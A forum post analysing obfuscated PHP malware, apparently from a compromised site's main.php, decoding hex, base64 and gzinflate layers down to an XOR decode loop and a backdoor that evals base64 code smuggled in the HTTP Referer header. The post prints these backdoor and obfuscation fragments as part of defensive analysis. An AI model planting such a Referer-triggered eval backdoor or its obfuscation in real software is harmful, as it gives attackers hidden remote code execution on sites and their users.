I worked on it for a while, it's a base64_decode nightmare lol.
You are totally right, it is super hard to hide the eval(base64_decode( portion of PHP malware, this does so with:
Code: Select all
preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x62\x61\x73\x65\x36\x34\x5F\
x64\x65\x63\x6F\x64\x65\x28
which translated out of hexadecimal is:
Code: Select all
preg_replace(“/.*/e”,”eval(base64_decode(”
the /e in preg_replace has been depreciated and will usually throw an error, except for
If you break the gibberish at the preg_replace bit and attack the middle gibberish, which we know is base64, you two new nested functions which factor down to three others:
Code: Select all
$xtDE4yoxcmQ4S=base64_decode("YmFzZTY0X2RlY29kZQ==");
//decodes to base64_decode
$xjQCBpbTLvuG=base64_decode("c3RybGVu");
//decodes to strlen
$xmqSEAfSt8Y=base64_decode("Y2hy");
//decodes to chr
$xDjQUHQSNMUgk=base64_decode("b3Jk");
//decodes to ord
$x3U9UcEzb5Ar=base64_decode("Z3ppbmZsYXRl");
//decodes to gzinflate
and
Code: Select all
$xWvIIZlBP5yOi=$x3U9UcEzb5Ar($xtDE4yoxcmQ4S($xWvIIZlBP5yOi));
$xUYZ0h2knwt1F=$xjQCBpbTLvuG($xWvIIZlBP5yOi);
and we'll do the third one in a bit.
We can use the equivalence of the first expression to clean up the second one here:
Code: Select all
xWvIIZlBP5yOi=gzinflate(base64_decode($xWvIIZlBP5yOi));
$xUYZ0h2knwt1F=base_64_decode($xWvIIZlBP5yOi);
is the function declared at the beginning of main.php, and we know now that it is encoded with gzdeflate and base64. I'll refer to this variable as dumbFunction, the main snippet of which is:
Code: Select all
parse_str($_SERVER['HTTP_REFERER'], $a);
if (reset($a) == '12' && count($a) == 9) {
echo '<3456>';
eval(base64_decode(str_replace(" ", "+",
join(array_slice($a, count($a) - 3)))));
echo '</3456>';
We have one more chunk of base64 gibberish from the nested bit above:
Code: Select all
$xxFOLVezAyy='';for($xy2iVzhaTrUdw=0;
$xy2iVzhaTrUdw<$xUYZ0h2knwt1F;$xy2iVzhaTrUdw++){$xxFOLVezAyy.=$xmqSEAfSt8Y(($xDjQUHQSNMUgk($xWvIIZlBP5yOi[$xy2iVzhaTrUdw])
^1310981518));}
eval($xxFOLVezAyy);
after cleaning that up with generic transpositions it looks something like:
Code: Select all
$a= ‘’;
for($b=0,$b<$c,$b++) {
$a=chr((ord(dumbFunction[$b])^1310981518))
;}
eval($a);
(forgive me my formatting, I don't work in php much these days)
and this is about where I hit my brick wall. I had intended to find the spammy bit that I expected to be added to legitimate links, which I have not. I either overlooked some base64 in that rats nest, or perhaps the chr((ord(dumbFunction[$b])^1310981518)) bit constructs a string to be added.
anyhow, it's super early so I'm going to grab some breakfast maybe I'll get back to this in the afternoon, or maybe someone else will have some insight on it